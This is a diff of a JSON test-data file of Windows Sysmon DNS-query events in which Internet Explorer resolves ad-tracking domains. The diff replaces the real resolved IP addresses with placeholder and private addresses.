@@ -6491,7 +6491,7 @@ "event_data": { "QueryName": "ads.yahoo.com", "QueryStatus": "0", - "QueryResults": "type: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:98.139.225.43;::ffff:98.138.49.44;::ffff:72.30.3.43;::ffff:216.155.194.56;", + "QueryResults": "type: 5 fo-fd-world-new.yax.gysm.yahoodns.net;::ffff:89.160.20.156;::ffff:98.138.49.44;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.945", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -6525,7 +6525,7 @@ "@timestamp": "2021-05-05T15:30:51.709Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:169.55.104.49;::ffff:169.60.66.35;::ffff:169.61.103.241;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054432800Z'/\u003e\u003cEventRecordID\u003e180\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.954\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eum.simpli.fi\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6541,7 +6541,7 @@ "ProcessId": "2736", "QueryName": "um.simpli.fi", "QueryStatus": "0", - "QueryResults": "::ffff:169.55.104.49;::ffff:169.60.66.35;::ffff:169.61.103.241;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -6588,7 +6588,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:35.186.236.204;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.955", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -6609,7 +6609,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.236.204;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054444800Z'/\u003e\u003cEventRecordID\u003e181\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003empp.vindicosuite.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -6618,7 +6618,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:8.41.222.152;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054454600Z'/\u003e\u003cEventRecordID\u003e182\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.955\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.1rx.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6636,7 +6636,7 @@ "ProcessId": "2736", "QueryName": "sync.1rx.io", "QueryStatus": "0", - "QueryResults": "::ffff:8.41.222.152;" + "QueryResults": "::ffff:89.160.20.156;" }, "process": { "pid": 2828, 
@@ -6660,7 +6660,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:23.52.160.7;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054464900Z'/\u003e\u003cEventRecordID\u003e183\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.956\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.teads.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -6681,7 +6681,7 @@ "ProcessId": "2736", "QueryName": "sync.teads.tv", "QueryStatus": "0", - "QueryResults": "type: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:23.52.160.7;", + "QueryResults": "type: 5 sync.teads.tv.edgekey.net;type: 5 e9957.g.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:07.956", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" 
@@ -6719,7 +6719,7 @@ "ProcessId": "2736", "QueryName": "s.thebrighttag.com", "QueryStatus": "0", - "QueryResults": "type: 5 td.thebrighttag.com;::ffff:3.15.109.176;::ffff:52.15.225.252;::ffff:3.18.121.79;::ffff:3.15.101.187;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "type: 5 td.thebrighttag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -6729,7 +6729,7 @@ "version": 5 }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.thebrighttag.com;::ffff:3.15.109.176;::ffff:52.15.225.252;::ffff:3.18.121.79;::ffff:3.15.101.187;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054482800Z'/\u003e\u003cEventRecordID\u003e184\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.019\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es.thebrighttag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.thebrighttag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -6763,7 +6763,7 @@ "event_data": { "QueryName": "t.a3cloud.net", "QueryStatus": "0", - "QueryResults": "type: 5 d386jaag4hn9zl.cloudfront.net;::ffff:54.192.55.189;", + "QueryResults": "type: 5 d386jaag4hn9zl.cloudfront.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.050", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -6774,7 +6774,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:54.192.55.189;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -6789,7 +6789,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 